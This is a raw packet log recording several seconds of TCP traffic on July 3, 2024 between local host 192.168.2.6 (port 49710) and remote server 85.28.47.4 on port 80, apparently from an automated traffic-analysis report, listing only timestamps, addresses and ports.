                                                                Jul 3, 2024 08:38:12.040652990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040693998 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040833950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040844917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040853977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040864944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040874958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040880919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040884018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040894032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040904045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040909052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040919065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040929079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040931940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040937901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040949106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040952921 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040958881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040982008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.041003942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.113267899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113282919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113292933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113332987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.113336086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113348007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113358021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113362074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.113404036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.113470078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113516092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.113535881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.113576889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116372108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116389036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116410971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116437912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116458893 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116503000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116513968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116523981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116547108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116588116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116692066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116702080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116712093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116744995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116763115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116873026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116883993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116925955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.116982937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.116993904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117003918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117008924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117018938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117023945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117034912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.117080927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.117360115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117369890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117379904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117389917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117398977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117409945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.117409945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.117432117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.117450953 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121169090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121180058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121189117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121253014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121263981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121263981 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121264935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121362925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121373892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121382952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121393919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121393919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121408939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121427059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121505022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121551037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121587992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121598005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121632099 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121643066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121644974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121654034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121678114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121692896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121737003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121747971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121757984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121779919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121799946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121921062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121932030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121941090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121951103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121961117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121965885 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.121973038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.121997118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.122025013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.122195005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122205973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122215033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122225046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122234106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122243881 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.122270107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.122394085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122438908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.122484922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122499943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.122535944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.122549057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125397921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125443935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125456095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125466108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125487089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125508070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125539064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125550032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125560999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125571012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125580072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125590086 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125618935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125725031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125735044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125745058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125780106 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125792980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125852108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125861883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125871897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125881910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.125894070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.125952959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126100063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126110077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126120090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126127958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126137972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126147032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126147985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126157999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126178980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126194000 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126355886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126368046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126400948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126432896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126444101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126454115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126463890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126466990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126473904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126497984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126558065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126688004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126698017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126708031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126718044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126728058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126733065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126764059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126903057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126914024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126924038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126934052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126944065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.126945972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126964092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.126980066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.127150059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127160072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127171040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127180099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127191067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127198935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.127226114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.127334118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127343893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.127376080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.127393961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.394356966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.399346113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:13.084861994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:13.085015059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:13.162439108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:13.167324066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:13.862174034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:13.862250090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:14.775974035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:14.780931950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:15.644769907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:15.644853115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:15.935923100 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:15.943645000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113509893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113532066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113549948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113564014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113578081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113678932 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.113718987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113734961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113739014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.113780975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.113852024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113874912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113888979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113902092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.113903999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.113948107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.114013910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.114026070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.114058971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.114088058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196098089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196141958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196157932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196180105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196234941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196257114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196295977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196304083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196309090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196322918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196340084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196365118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196559906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196577072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196590900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196604013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196618080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196619987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196636915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.196641922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.196674109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.197024107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197056055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197069883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197074890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.197082043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197096109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197104931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.197109938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197122097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197135925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197150946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197153091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.197165012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197179079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.197182894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.197222948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.197242975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.200800896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.200860977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278206110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278258085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278274059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278280973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278315067 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278331995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278346062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278351068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278354883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278368950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278430939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278471947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278512001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278568029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278630018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278645039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278657913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278671026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278671026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278687954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278696060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278700113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278747082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278907061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.278948069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.278995037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279010057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279022932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279031992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.279036045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279050112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279062986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279073954 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.279124022 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.279458046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279473066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279485941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279499054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279501915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.279524088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279539108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279552937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279560089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.279597044 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.279962063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279978991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.279994965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280009031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280014992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280023098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280035973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280042887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280049086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280061960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280073881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280086994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280101061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280113935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280122042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280128002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280138016 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280143023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280169010 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280189037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280761957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280778885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280793905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280807972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280807972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280822039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280834913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.280836105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280848980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280864000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.280873060 CEST4971080192.168.2.685.28.47.4
